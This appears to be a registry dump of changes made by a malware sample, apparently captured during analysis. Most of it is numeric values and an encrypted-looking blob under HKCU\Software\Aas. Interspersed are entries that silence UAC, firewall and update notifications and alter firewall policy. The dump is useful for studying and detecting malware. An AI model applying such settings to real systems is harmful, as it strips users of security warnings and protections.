"a4_886" = "2056873910"
"a3_793" = "1406704208"
"a3_809" = "1488018592"
"a3_798" = "1442679927"
"a3_799" = "1416568982"
"a3_248" = "1761236945"
"a2_172" = "1233088213"
"a4_797" = "1418822141"
"a4_796" = "1411653020"
"a4_795" = "1404483899"
"a4_794" = "1397314778"
"a4_793" = "1390145657"
"a4_792" = "1382976536"
"a4_791" = "1375807415"
"a4_790" = "1368638294"
"a1_839" = "2909027320"
"a1_838" = "1214041042"
"a4_799" = "1433160383"
"a4_798" = "1425991262"
"a4_663" = "458159927"
"a4_662" = "450990806"
"a4_661" = "443821685"
"a4_660" = "436652564"
"a4_667" = "486836411"
"a4_666" = "479667290"
"a4_665" = "472498169"
"a4_664" = "465329048"
"a1_907" = "3077659490"
"a1_906" = "3546965378"
"a4_669" = "501174653"
"a4_668" = "494005532"
"a1_903" = "3110118893"
"a1_902" = "2111314808"
"a1_901" = "2410049084"
"a1_900" = "2794293840"
"a3_857" = "1865835152"
"a3_856" = "1824837233"
"a3_855" = "1817794014"
"a3_854" = "1844425151"
"a3_853" = "1836850460"
"a3_852" = "1829861629"
"a3_851" = "1789379674"
"a3_850" = "1781801019"
"a1_635" = "4060128545"
"a4_949" = "2508528533"
"a3_859" = "1846328146"
"a3_858" = "1872824115"
"a1_734" = "3611434455"
"a2_644" = "321951811"
"a4_976" = "2702094800"
"a4_454" = "3254780934"
"a1_524" = "3029277202"
"a4_407" = "2917832247"
"a4_406" = "2910663126"
"a4_405" = "2903494005"
"a4_404" = "2896324884"
"a4_403" = "2889155763"
"a4_402" = "2881986642"
"a4_401" = "2874817521"
"a4_400" = "2867648400"
"a1_825" = "390801986"
"a1_879" = "3843954609"
"a3_640" = "276404393"
"a4_409" = "2932170489"
"a4_408" = "2925001368"
"a3_641" = "283851976"
"a3_646" = "352855791"
"a3_647" = "360438542"
"a4_789" = "1361469173"
"a1_129" = "499975063"
"a1_128" = "4002356052"
"a1_125" = "2689594227"
"a1_124" = "2424147277"
"a1_127" = "1830354903"
"a1_126" = "2373065"
"a1_121" = "2717593740"
"a1_120" = "3874491140"
"a1_123" = "623366991"
"a1_122" = "217618551"
"a4_331" = "2372979051"
"a4_330" = "2365809930"
"a4_333" = "2387317293"
"a4_332" = "2380148172"
"a4_335" = "2401655535"
"a4_334" = "2394486414"
"a4_337" = "2415993777"
"a4_336" = "2408824656"
"a4_339" = "2430332019"
"a4_338" = "2423162898"
"a1_833" = "2045653207"
"a4_539" = "3864156219"
"a4_538" = "3856987098"
"a4_249" = "1785111129"
"a4_248" = "1777942008"
"a1_832" = "3386641006"
"a4_245" = "1756434645"
"a4_244" = "1749265524"
"a4_247" = "1770772887"
"a4_246" = "1763603766"
"a4_241" = "1727758161"
"a4_240" = "1720589040"
"a4_243" = "1742096403"
"a4_242" = "1734927282"
"a1_830" = "3006818215"
"a1_837" = "2046415996"
"a1_836" = "1471223928"
"a1_835" = "506371775"
"a1_754" = "1151686891"
"a4_993" = "2823969857"
"a1_834" = "4132990846"
"a1_634" = "104415599"
"a2_463" = "3319304682"
"a2_462" = "3312138459"
"a2_461" = "3304971387"
"a2_460" = "3297788691"
"a2_467" = "3347972441"
"a2_466" = "3340803007"
"a2_465" = "3333650204"
"a2_464" = "3326474225"
"a2_469" = "3362322526"
"a2_468" = "3355156313"
"a1_934" = "3591785402"
"a4_802" = "1454667746"
"a4_872" = "1956506216"
"a2_869" = "1934990952"
"a2_868" = "1927838246"
"a2_867" = "1920659249"
"a2_866" = "1913489605"
"a2_865" = "1906323994"
"a2_864" = "1899158845"
"a2_863" = "1891988840"
"a1_791" = "1504348683"
"a2_861" = "1877640835"
"a2_860" = "1870473570"
"a2_597" = "4279960050"
"a2_596" = "4272794059"
"a2_595" = "4265628117"
"a2_594" = "4258463477"
"a1_338" = "1168606377"
"a1_339" = "2643564842"
"a2_591" = "4236945452"
"a2_590" = "4229778834"
"a1_334" = "578861251"
"a1_335" = "184448182"
"a1_336" = "3760924533"
"a1_337" = "3290197519"
"a1_330" = "703462671"
"a1_331" = "54800311"
"a1_332" = "1685649520"
"a1_333" = "1711265904"
"a2_607" = "56695136"
"a2_606" = "49512641"
"a3_30" = "231909751"
"a2_604" = "35189014"
"a1_64" = "4024610170"
"a2_602" = "20845952"
"a2_601" = "13677060"
"a2_600" = "6512503"
"a4_875" = "1978013579"
"a2_609" = "71031869"
"a2_608" = "63864591"
"a2_265" = "1899819304"
"a2_264" = "1892653656"
"a2_267" = "1914154185"
"a2_266" = "1906989982"
"a2_261" = "1871138504"
"a2_260" = "1863969571"
"a2_263" = "1885472730"
"a2_262" = "1878304043"
"a2_919" = "2293452784"
"a1_908" = "3453607025"
"a2_269" = "1928488830"
"a2_268" = "1921321172"
"a1_905" = "655917524"
"a2_884" = "2042527993"
"a1_482" = "4226090616"
"a1_483" = "1810191455"
"a2_289" = "2071873169"
"a2_288" = "2064698567"
"a1_486" = "2245001074"
"a1_487" = "1985463891"
"a1_484" = "3964511762"
"a1_485" = "582550657"
"a2_283" = "2028859201"
"a2_282" = "2021690489"
"a2_281" = "2014525714"
"a2_280" = "2007356622"
"a2_287" = "2057542948"
"a2_286" = "2050374883"
"a2_285" = "2043191725"
"a2_284" = "2036025304"
"a2_739" = "1003016628"
"a2_738" = "995836605"
"a3_522" = "3725445091"
"a2_733" = "960003892"
"a2_732" = "952834530"
"a2_731" = "945666578"
"a2_730" = "938484639"
"a2_737" = "988671171"
"a2_736" = "981500889"
"a2_735" = "974334303"
"a2_734" = "967170378"
"a4_446" = "3197427966"
"a1_637" = "4289777240"
"a3_912" = "2226582457"
"a1_240" = "1888556951"
"a1_241" = "472744687"
"a1_242" = "3058936332"
"a1_243" = "2628265565"
"a1_244" = "3852462282"
"a1_245" = "362573412"
"a1_246" = "1201760128"
"a1_247" = "1652107045"
"a1_248" = "3990502546"
"a1_249" = "2587302919"
"a3_738" = "978859403"
"a3_739" = "986426922"
"a4_445" = "3190258845"
"a2_131" = "939147894"
"a2_130" = "931980891"
"a2_133" = "953496019"
"a2_132" = "946330291"
"a2_135" = "967833904"
"a2_134" = "960664695"
"a2_137" = "982166193"
"a2_136" = "974998967"
"a2_139" = "996514227"
"a2_138" = "989347454"
"a4_889" = "2078381273"
"a4_888" = "2071212152"
"a2_79" = "566354957"
"a2_78" = "559189617"
"a3_916" = "2254979389"
"a3_288" = "2048100105"
"a3_289" = "2055027624"
"a3_184" = "1336102801"
"a3_917" = "2262558044"
"a3_282" = "2038692083"
"a3_283" = "2045680914"
"a3_280" = "1990631473"
"a3_281" = "2031109200"
"a3_286" = "2067091063"
"a3_287" = "2074141334"
"a3_284" = "2019045813"
"a3_285" = "2026624468"
"a3_606" = "66123703"
"a3_607" = "40004566"
"a3_604" = "52150005"
"a3_605" = "59069204"
"a3_602" = "4023859"
"a3_603" = "11016786"
"a3_600" = "23079281"
"a3_601" = "30657936"
"a4_700" = "723417404"
"a3_608" = "46992457"
"a3_609" = "87597288"
"a1_796" = "226709699"
"a1_583" = "2241026978"
"a1_794" = "1221264522"
"a1_795" = "629567253"
"a1_792" = "3315245633"
"a1_793" = "116422688"
"a1_790" = "930008649"
"a1_582" = "2778799272"
"a3_635" = "240424626"
"a3_911" = "2219532038"
"a1_581" = "4017401496"
"a1_798" = "333538965"
"a1_799" = "3087451236"
"a1_580" = "3100129418"
"a3_198" = "1436076335"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKCU\Software\Aas]
"a3_196" = "1388556397"
"a3_197" = "1429034124"
"a3_194" = "1407548331"
"a3_195" = "1380982730"
"a3_192" = "1393042153"
"a3_193" = "1400620808"
"a3_190" = "1345525207"
"a3_191" = "1352568438"
"a2_981" = "2737942844"
"a1_585" = "2975035927"
"a3_468" = "3338201981"
"a3_469" = "3379269532"
"a3_466" = "3324236475"
"a3_467" = "3331159770"
"a3_464" = "3343287801"
"a3_465" = "3350216216"
"a3_462" = "3295169831"
"a3_463" = "3302744390"
"a3_460" = "3314758757"
"a3_461" = "3321800836"
"a1_468" = "3921200395"
"a1_469" = "906977248"
"a3_518" = "3696916079"
"a3_519" = "3703958158"
"a1_460" = "1217202694"
"a1_461" = "831879874"
"a1_462" = "3238851506"
"a1_463" = "3552727515"
"a1_464" = "1572181995"
"a1_465" = "1321475471"
"a1_466" = "356288489"
"a1_467" = "4056281565"
"a3_29" = "224867540"
"a3_28" = "183865525"
"a1_668" = "1172656216"
"a1_669" = "1298915360"
"a3_21" = "167399900"
"a3_20" = "159956413"
"a3_23" = "148336286"
"a3_22" = "140888703"
"a3_25" = "195929936"
"a3_24" = "188875569"
"a3_27" = "176880658"
"a3_26" = "169827315"
"a2_830" = "1655396276"
"a3_994" = "2847713931"
"a3_992" = "2800197065"
"a3_499" = "3560555322"
"a3_990" = "2785625399"
"a2_831" = "1662569593"
"a3_498" = "3587059355"
"a2_832" = "1669736229"
"a3_497" = "3579611768"
"a2_833" = "1676903906"
"a3_496" = "3539014105"
"a2_834" = "1684085505"
"a3_495" = "3532029350"
"a2_835" = "1691252196"
"a4_955" = "2551543259"
"a3_494" = "3524581639"
"a2_836" = "1698426199"
"a3_493" = "3551077604"
"a2_837" = "1705586549"
"a3_492" = "3544154181"
"a3_491" = "3503090722"
"a3_527" = "3761424774"
"a3_490" = "3496037251"
"a3_775" = "1244236686"
"a4_915" = "2264778419"
"a3_868" = "1944793805"
"a2_529" = "3792467854"
"a4_914" = "2257609298"
"a3_862" = "1901368503"
"a3_863" = "1908803798"
"a3_860" = "1853775861"
"a3_861" = "1860825108"
"a3_866" = "1930361355"
"a3_867" = "1937350314"
"a3_864" = "1882303817"
"a3_865" = "1889747432"
"a1_806" = "3027555282"
"a1_807" = "1478153728"
"a1_804" = "2472213786"
"a1_805" = "4237724971"
"a1_802" = "2257277118"
"a1_803" = "3758330382"
"a1_800" = "2873727094"
"a1_801" = "198824186"
"a1_808" = "2096865174"
"a1_809" = "1347442431"
"a4_656" = "407976080"
"a4_657" = "415145201"
"a4_654" = "393637838"
"a4_655" = "400806959"
"a4_652" = "379299596"
"a4_653" = "386468717"
"a4_650" = "364961354"
"a4_651" = "372130475"
"a1_938" = "592675028"
"a1_939" = "344183708"
"a4_658" = "422314322"
"a4_659" = "429483443"
"a3_773" = "1263760076"
"a4_849" = "1791616433"
"a4_919" = "2293454903"
"a4_918" = "2286285782"
"a2_656" = "407971689"
"a1_875" = "2456747069"
"a4_925" = "2336469629"
"a3_762" = "1151312531"
"a1_684" = "309846654"
"a4_989" = "2795293373"
"a4_438" = "3140074998"
"a4_439" = "3147244119"
"a1_874" = "1207583382"
"a4_432" = "3097060272"
"a4_433" = "3104229393"
"a4_430" = "3082722030"
"a4_431" = "3089891151"
"a4_436" = "3125736756"
"a4_437" = "3132905877"
"a4_434" = "3111398514"
"a4_435" = "3118567635"
"a3_928" = "2374546825"
"a4_344" = "2466177624"
"a4_345" = "2473346745"
"a4_346" = "2480515866"
"a4_347" = "2487684987"
"a4_340" = "2437501140"
"a4_341" = "2444670261"
"a4_342" = "2451839382"
"a4_343" = "2459008503"
"a3_764" = "1198848853"
"a4_348" = "2494854108"
"a4_349" = "2502023229"
"a4_508" = "3641913468"
"a4_509" = "3649082589"
"a4_506" = "3627575226"
"a4_507" = "3634744347"
"a4_504" = "3613236984"
"a4_505" = "3620406105"
"a4_502" = "3598898742"
"a4_503" = "3606067863"
"a4_500" = "3584560500"
"a4_501" = "3591729621"
"a3_383" = "2729068342"
"a3_382" = "2721620631"
"a4_882" = "2028197426"
"a3_381" = "2748124788"
"a2_456" = "3269126402"
"a2_457" = "3276286863"
"a2_454" = "3254787878"
"a3_380" = "2741212629"
"a2_452" = "3240435967"
"a2_453" = "3247605727"
"a2_450" = "3226103077"
"a2_451" = "3233269939"
"a3_387" = "2757612682"
"a3_633" = "259938800"
"a2_458" = "3283455764"
"a3_386" = "2784112747"
"a3_385" = "2776670152"
"a4_881" = "2021028305"
"a3_384" = "2769681321"
"a1_735" = "3705091684"
"a2_852" = "1813120419"
"a1_730" = "2722885284"
"a2_850" = "1798791032"
"a2_851" = "1805955238"
"a2_856" = "1841803985"
"a2_857" = "1848974803"
"a2_854" = "1827456799"
"a1_731" = "3843546292"
"a3_632" = "252486993"
"a2_858" = "1856140417"
"a2_859" = "1863316156"
"a1_732" = "3160653598"
"a1_733" = "722041630"
"a1_329" = "767025692"
"a1_328" = "3820081654"
"a1_327" = "233415132"
"a1_326" = "3335234011"
"a1_325" = "3545517540"
"a1_324" = "2845262996"
"a1_323" = "238043327"
"a1_322" = "3467187549"
"a1_321" = "1035169700"
"a1_320" = "217051003"
"a2_650" = "364969319"
"a1_436" = "579767432"
"a1_736" = "644120873"
"a3_631" = "211878206"
"a1_737" = "3226083464"
"a2_652" = "379305059"
"a3_923" = "2339079058"
"a2_926" = "2343635399"
"a2_927" = "2350800629"
"a2_924" = "2329301595"
"a2_653" = "386470840"
"a4_887" = "2064043031"
"a2_923" = "2322136306"
"a2_920" = "2300618554"
"a2_921" = "2307798281"
"a2_654" = "393639538"
"a2_928" = "2357969987"
"a2_655" = "400802661"
"a3_630" = "204893343"
"a2_657" = "415139415"
"a3_922" = "2298015603"
"a1_495" = "2200345849"
"a1_494" = "899202022"
"a1_497" = "3262123616"
"a1_496" = "3674442041"
"a1_491" = "1202951605"
"a1_490" = "2351384775"
"a1_493" = "2460429581"
"a1_492" = "2282537400"
"a1_499" = "3187754856"
"a1_498" = "3299085068"
"a3_637" = "288468852"
"a2_708" = "780763386"
"a2_709" = "787978162"
"a2_706" = "766440359"
"a2_707" = "773598612"
"a2_704" = "752101869"
"a2_705" = "759264589"
"a2_702" = "737763743"
"a2_703" = "744930132"
"a2_700" = "723414587"
"a2_701" = "730580101"
"a4_885" = "2049704789"
"a2_638" = "278923359"
"a2_639" = "286104452"
"a3_808" = "1481095169"
"a2_632" = "235918343"
"a2_633" = "243077710"
"a2_630" = "221583590"
"a2_631" = "228752624"
"a2_636" = "264599755"
"a2_637" = "271771498"
"a2_634" = "250249485"
"a2_635" = "257417253"
"a1_253" = "3498831385"
"a1_252" = "1078990264"
"a1_251" = "880690242"
"a1_250" = "2022323056"
"a1_257" = "1348334927"
"a1_256" = "2371159389"
"a1_255" = "3812134850"
"a1_254" = "2678023682"
"a3_920" = "2284050097"
"a1_259" = "992568891"
"a1_258" = "3210906031"
"a3_729" = "914469392"
"a3_728" = "907418097"
"a4_884" = "2042535668"
"a2_144" = "1032350713"
"a2_145" = "1039531835"
"a2_146" = "1046686021"
"a2_147" = "1053852036"
"a2_140" = "1003683571"
"a2_141" = "1010848634"
"a2_142" = "1018007071"
"a2_143" = "1025192446"
"a1_781" = "4151709411"
"a1_780" = "3739808306"
"a2_68" = "487501849"
"a2_69" = "494670094"
"a2_148" = "1061033607"
"a2_149" = "1068200082"
"a1_787" = "2356295262"
"a4_455" = "3261950055"
"a3_299" = "2126993250"
"a3_298" = "2119545539"
"a3_295" = "2131608046"
"a3_294" = "2091003215"
"a3_297" = "2146049696"
"a3_296" = "2139060737"
"a3_291" = "2103079018"
"a3_290" = "2062081995"
"a3_293" = "2083555628"
"a3_292" = "2110067853"
"a2_987" = "2780961089"
"a1_904" = "4136123974"
"a3_634" = "266990099"
"a3_619" = "159571106"
"a3_618" = "152516611"
"a3_611" = "68549034"
"a3_610" = "95044875"
"a3_613" = "82982508"
"a3_612" = "75537869"
"a3_615" = "131026734"
"a3_614" = "123579023"
"a3_617" = "111511520"
"a3_616" = "104522561"
"a3_181" = "1280611004"
"a3_180" = "1307180573"
"a3_34" = "260325067"
"a3_182" = "1288058591"
"a3_185" = "1309597744"
"a3_33" = "253401768"
"a3_187" = "1324038386"
"a3_186" = "1316586579"
"a3_189" = "1371566516"
"a3_188" = "1364647189"
"a3_38" = "289377359"
"a3_39" = "296296686"
"a3_471" = "3359687774"
"a3_470" = "3386187839"
"a3_473" = "3407682832"
"a3_472" = "3367139569"
"a3_475" = "3422180818"
"a3_474" = "3414733235"
"a3_477" = "3403113108"
"a4_282" = "2021692122"
"a3_479" = "3450714966"
"a3_478" = "3443656503"
"a1_479" = "214635012"
"a1_478" = "535369390"
"a3_509" = "3632529140"
"a3_508" = "3624950357"
"a1_473" = "3543533826"
"a1_472" = "2164304998"
"a1_471" = "659385612"
"a1_470" = "3866699320"
"a1_477" = "3207631712"
"a1_476" = "3986024451"
"a1_475" = "3546390948"
"a1_474" = "1368939846"
"a4_533" = "3821141493"
"a1_679" = "703130473"
"a1_678" = "922969180"
"a4_532" = "3813972372"
"a1_675" = "4016316799"
"a1_674" = "3467639772"
"a1_677" = "1489410111"
"a1_676" = "1005611633"
"a1_671" = "924698625"
"a4_531" = "3806803251"
"a1_673" = "793431128"
"a1_672" = "2013822510"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_530" = "3799634130"
"a4_537" = "3849817977"
"a4_536" = "3842648856"
"a3_989" = "2812256404"
"a1_868" = "846596912"
"a4_535" = "3835479735"
"a3_981" = "2721238428"
"a3_980" = "2747738493"
"a3_983" = "2769230430"
"a4_534" = "3828310614"
"a3_985" = "2783204112"
"a3_984" = "2776284913"
"a3_987" = "2764139474"
"a3_986" = "2757228467"
"a2_151" = "1082534417"
"a2_150" = "1075366125"
"a1_869" = "153123048"
"a2_271" = "1942839264"
"a3_879" = "1989722918"
"a3_878" = "1982672519"
"a1_823" = "2555115930"
"a3_874" = "1954273539"
"a3_877" = "2009303652"
"a3_876" = "2001736133"
"a3_871" = "1966337070"
"a3_870" = "1925204879"
"a3_873" = "1946690784"
"a3_872" = "1973321793"
"a2_159" = "1139887900"
"a4_758" = "1139226422"
"a2_158" = "1132719929"
"a1_925" = "799192776"
"a1_924" = "3248521378"
"a1_927" = "3272737385"
"a1_926" = "3214498144"
"a1_921" = "797725622"
"a1_920" = "2955194781"
"a3_787" = "1363737626"
"a1_922" = "3990140020"
"a3_80" = "590099577"
"a1_929" = "3912466801"
"a1_928" = "191676151"
"a4_649" = "357792233"
"a4_648" = "350623112"
"a4_641" = "300439265"
"a4_640" = "293270144"
"a4_643" = "314777507"
"a4_642" = "307608386"
"a4_645" = "329115749"
"a4_644" = "321946628"
"a4_647" = "343453991"
"a4_646" = "336284870"
"a3_786" = "1323129851"
"a1_819" = "691028123"
"a1_818" = "998693804"
"a3_785" = "1316202328"
"a3_746" = "1069934723"
"a1_811" = "808633083"
"a1_810" = "2536876996"
"a1_813" = "3261187592"
"a1_812" = "176415261"
"a1_815" = "2874111614"
"a1_814" = "3516310583"
"a1_817" = "2813111874"
"a1_816" = "220667206"
"a4_963" = "2608896227"
"a4_429" = "3075552909"
"a4_428" = "3068383788"
"a4_425" = "3046876425"
"a4_424" = "3039707304"
"a4_427" = "3061214667"
"a4_426" = "3054045546"
"a4_421" = "3018199941"
"a4_420" = "3011030820"
"a4_423" = "3032538183"
"a4_422" = "3025369062"
"a3_743" = "1014841262"
"a3_745" = "1062892640"
"a3_742" = "1007917839"
"a4_967" = "2637572711"
"a3_741" = "1033955052"
"a2_802" = "1454656329"
"a4_357" = "2559376197"
"a4_356" = "2552207076"
"a4_355" = "2545037955"
"a4_354" = "2537868834"
"a4_353" = "2530699713"
"a4_352" = "2523530592"
"a4_351" = "2516361471"
"a4_350" = "2509192350"
"a3_747" = "1043369250"
"a4_359" = "2573714439"
"a4_358" = "2566545318"
"a4_511" = "3663420831"
"a4_510" = "3656251710"
"a4_513" = "3677759073"
"a4_512" = "3670589952"
"a4_515" = "3692097315"
"a4_514" = "3684928194"
"a4_517" = "3706435557"
"a4_516" = "3699266436"
"a4_519" = "3720773799"
"a4_518" = "3713604678"
"a3_744" = "1021891521"
"a3_749" = "1091421668"
"a1_994" = "464977948"
[HKCU\Software\Aas\695404737]
"50183847" = "6CB4F357E15540EBCF387CD502BE18BB83B2095EA6EE884B0D059449A5342D68E3B2D27FB714B9250509608EC3DEB7EEA20A33E26D97C5486AA270018FFA46A16EE0AF4EE22779AE1BD1BBA23B356C014518440564740352676BB249C23112961C700B388C12E7360016EE2DAFC09E2689A619CC82C6AA0421112571C15FFB27"
[HKCU\Software\Aas]
"a2_845" = "1762935570"
"a2_844" = "1755771691"
"a2_847" = "1777273571"
"a2_846" = "1770102965"
"a2_841" = "1734268413"
"a2_840" = "1727087962"
"a2_843" = "1748603574"
"a2_842" = "1741435005"
"a3_780" = "1280228773"
"a3_533" = "3804403676"
"a2_849" = "1791622412"
"a2_848" = "1784451536"
"a1_312" = "2290445478"
"a1_313" = "4278217005"
"a1_310" = "2096060354"
"a1_311" = "3232239173"
"a1_316" = "709456274"
"a1_317" = "2730619047"
"a1_314" = "2420229575"
"a1_315" = "3594888677"
"a3_620" = "166490309"
"a1_318" = "2496015900"
"a1_319" = "2876456070"
"a4_929" = "2365146113"
"a4_982" = "2745109526"
"a2_449" = "3218942701"
"a2_448" = "3211767835"
"a3_621" = "140449124"
"a2_441" = "3161585152"
"a2_440" = "3154420594"
"a2_443" = "3175919062"
"a2_442" = "3168752793"
"a2_445" = "3190251756"
"a2_444" = "3183083804"
"a2_447" = "3204603440"
"a2_446" = "3197434944"
"a2_939" = "2436838828"
"a2_938" = "2429670714"
"a4_893" = "2107057757"
"a2_931" = "2379493300"
"a2_930" = "2372318900"
"a2_933" = "2393820402"
"a2_932" = "2386652358"
"a2_935" = "2408154408"
"a2_934" = "2400983305"
"a2_937" = "2422490759"
"a2_936" = "2415337039"
"a3_818" = "1552537563"
"a2_711" = "802286765"
"a2_710" = "795113762"
"a2_713" = "816614521"
"a2_712" = "809449601"
"a2_715" = "830948209"
"a2_714" = "823776344"
"a2_717" = "845299475"
"a2_716" = "838117078"
"a2_719" = "859632313"
"a2_718" = "852464085"
"a1_587" = "3130574844"
"a3_623" = "187965990"
"a2_629" = "214416334"
"a2_628" = "207234891"
"a2_625" = "185731789"
"a2_624" = "178566525"
"a2_627" = "200068658"
"a2_626" = "192899197"
"a2_621" = "157050919"
"a2_620" = "149881182"
"a2_623" = "171398751"
"a2_622" = "164231949"
"a1_266" = "1350728086"
"a1_267" = "1401905378"
"a1_264" = "1553260102"
"a1_265" = "3854462512"
"a1_262" = "3309523602"
"a1_263" = "2987030014"
"a1_260" = "929631485"
"a1_261" = "680354745"
"a1_268" = "2105117502"
"a1_269" = "4217194077"
"a2_157" = "1125554298"
"a2_156" = "1118384774"
"a2_155" = "1111216580"
"a2_154" = "1104051100"
"a2_153" = "1096865843"
"a2_152" = "1089714761"
"a2_99" = "709751147"
"a2_98" = "702575800"
"a2_97" = "695406973"
"a2_96" = "688227479"
"a2_95" = "681060180"
"a2_94" = "673905557"
"a2_93" = "666725917"
"a2_92" = "659556474"
"a2_91" = "652393188"
"a2_90" = "645230544"
"a3_260" = "1847236781"
"a3_261" = "1854160076"
"a3_262" = "1861734767"
"a3_263" = "1902212494"
"a3_264" = "1909255713"
"a3_265" = "1883210304"
"a3_266" = "1890133731"
"a3_267" = "1930746626"
"a3_268" = "1938194341"
"a3_269" = "1945179076"
"a1_915" = "2367242608"
"a1_847" = "3847909569"
"a3_404" = "2913010493"
"a1_844" = "2084677244"
"a3_405" = "2886510428"
"a1_845" = "824812864"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a2_862" = "1884806313"
"a4_983" = "2752278647"
"a1_961" = "425622941"
"a3_668" = "477267765"
"a3_669" = "484195156"
"a1_960" = "2241691803"
"a3_664" = "448737713"
"a3_665" = "489346512"
"a3_666" = "496258675"
"a3_667" = "470278802"
"a3_660" = "453353533"
"a3_661" = "460801116"
"a3_662" = "467859711"
"a3_663" = "441294110"
"a3_43" = "324843106"
"a3_42" = "284237251"
"a3_41" = "277248416"
"a3_40" = "269796609"
"a3_47" = "353765350"
"a3_46" = "313221959"
"a3_45" = "305778468"
"a3_44" = "332278405"
"a1_965" = "920052320"
"a3_49" = "368270520"
"a3_48" = "360822809"
"a1_964" = "3141184024"
"a4_99" = "709742979"
"a4_98" = "702573858"
"a3_406" = "2893962239"
"a3_407" = "2901015582"
"a3_400" = "2884615609"
"a3_401" = "2857980376"
"a3_402" = "2865023611"
"a3_403" = "2906025626"
"a4_91" = "652390011"
"a4_90" = "645220890"
"a4_93" = "666728253"
"a4_92" = "659559132"
"a4_95" = "681066495"
"a4_94" = "673897374"
"a4_97" = "695404737"
"a4_96" = "688235616"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKCU\Software\Aas]
"a1_448" = "1826617722"
"a1_449" = "2894051455"
"a1_446" = "2847338048"
"a3_408" = "2941554865"
"a1_444" = "814677728"
"a1_445" = "813870020"
"a1_442" = "3208588845"
"a1_443" = "2520195173"
"a1_440" = "1224195046"
"a3_409" = "2949002448"
"a1_680" = "1161361020"
"a1_681" = "2496774151"
"a1_682" = "2463587414"
"a1_683" = "3736371317"
"a2_561" = "4021871994"
"a1_685" = "2897339600"
"a1_686" = "1066375865"
"a1_687" = "1713224562"
"a1_688" = "2452248553"
"a1_689" = "3530401214"
"a3_834" = "1700949547"
"a3_988" = "2804681845"
"a1_767" = "1538781888"
"a1_766" = "2410730337"
"a3_318" = "2262948439"
"a3_319" = "2303950582"
"a2_599" = "4294297952"
"a3_310" = "2239031135"
"a3_311" = "2246548478"
"a3_312" = "2219916305"
"a3_313" = "2226966704"
"a3_314" = "2267968723"
"a3_315" = "2275010930"
"a3_316" = "2248445333"
"a3_317" = "2255889972"
"a3_933" = "2410528684"
"a4_928" = "2357976992"
"a3_934" = "2384417743"
"a1_760" = "696903492"
"a2_605" = "42348090"
"a3_935" = "2391471214"
"a3_476" = "3395669621"
"a1_447" = "3866139621"
"a2_603" = "28011794"
"a3_880" = "2030724953"
"a3_881" = "2037718008"
"a3_882" = "2044771355"
"a3_883" = "2018660538"
"a3_884" = "2025714909"
"a3_885" = "2066704764"
"a3_886" = "2073693599"
"a1_745" = "1872612480"
"a3_888" = "2054642257"
"a3_889" = "2061696752"
"a1_769" = "882364113"
"a1_441" = "307471700"
"a4_964" = "2616065348"
"a1_744" = "1682727637"
"a4_988" = "2788124252"
"a4_857" = "1848969401"
"a4_638" = "278931902"
"a4_639" = "286101023"
"a4_634" = "250255418"
"a4_635" = "257424539"
"a4_636" = "264593660"
"a4_637" = "271762781"
"a4_630" = "221578934"
"a4_631" = "228748055"
"a4_632" = "235917176"
"a4_633" = "243086297"
"a2_913" = "2250435237"
"a1_747" = "2808186437"
"a2_912" = "2243266195"
"a2_911" = "2236098978"
"a2_651" = "372138360"
"a2_910" = "2228929945"
"a3_794" = "1380597491"
[HKCU\Software\Aas\695404737]
"35845605" = "392"
[HKCU\Software\Aas]
"a2_917" = "2279123620"
"a4_883" = "2035366547"
"a2_916" = "2271950215"
"a4_740" = "1010182244"
"a4_741" = "1017351365"
"a4_742" = "1024520486"
"a4_743" = "1031689607"
"a4_744" = "1038858728"
"a4_745" = "1046027849"
"a4_746" = "1053196970"
"a4_747" = "1060366091"
"a4_748" = "1067535212"
"a4_749" = "1074704333"
"a1_866" = "1411065417"
"a1_867" = "247249982"
"a1_860" = "3812348768"
"a1_861" = "2360832110"
"a1_862" = "3409793117"
"a4_859" = "1863307643"
"a4_182" = "1304780022"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_180" = "1290441780"
"a4_181" = "1297610901"
"a4_186" = "1333456506"
"a4_187" = "1340625627"
"a4_184" = "1319118264"
"a4_185" = "1326287385"
"a4_188" = "1347794748"
"a4_189" = "1354963869"
"a1_741" = "4184730763"
"a2_918" = "2286284166"
"a4_168" = "1204412328"
"a1_194" = "499211836"
"a1_195" = "165979735"
"a4_160" = "1147059360"
"a4_161" = "1154228481"
"a4_162" = "1161397602"
"a4_163" = "1168566723"
"a4_164" = "1175735844"
"a4_165" = "1182904965"
"a4_166" = "1190074086"
"a4_167" = "1197243207"
"a4_296" = "2122059816"
"a4_297" = "2129228937"
"a4_294" = "2107721574"
"a4_295" = "2114890695"
"a4_292" = "2093383332"
"a4_293" = "2100552453"
"a4_290" = "2079045090"
"a4_291" = "2086214211"
"a4_142" = "1018015182"
"a3_952" = "2546868881"
"a4_568" = "4072060728"
"a4_569" = "4079229849"
"a4_298" = "2136398058"
"a4_299" = "2143567179"
"a2_598" = "4287127990"
"a1_192" = "845874045"
"a1_193" = "337306603"
"a1_969" = "2253316243"
"a4_934" = "2400991718"
"a3_993" = "2840671848"
"a3_790" = "1351657855"
"a4_958" = "2573050622"
"a1_742" = "367024505"
"a4_368" = "2638236528"
"a4_369" = "2645405649"
"a4_362" = "2595221802"
"a4_363" = "2602390923"
"a4_360" = "2580883560"
"a4_361" = "2588052681"
"a4_366" = "2623898286"
"a4_367" = "2631067407"
"a4_364" = "2609560044"
"a4_365" = "2616729165"
"a1_305" = "1304522431"
"a1_304" = "2213019789"
"a1_307" = "1314788896"
"a1_306" = "3833159051"
"a1_301" = "1767093825"
"a1_300" = "1890527715"
"a1_303" = "3884254321"
"a1_302" = "2361813855"
"a3_792" = "1399711281"
"a1_309" = "307386179"
"a1_308" = "3738036461"
"a2_540" = "3871320949"
"a2_541" = "3878500204"
"a2_542" = "3885670049"
"a1_481" = "2095769884"
"a2_544" = "3900009888"
"a2_545" = "3907168250"
"a2_546" = "3914336986"
"a2_547" = "3921502540"
"a2_548" = "3928670578"
"a2_549" = "3935853188"
"a2_894" = "2114229028"
"a2_895" = "2121398384"
"a2_892" = "2099895968"
"a2_893" = "2107063035"
"a2_890" = "2085545159"
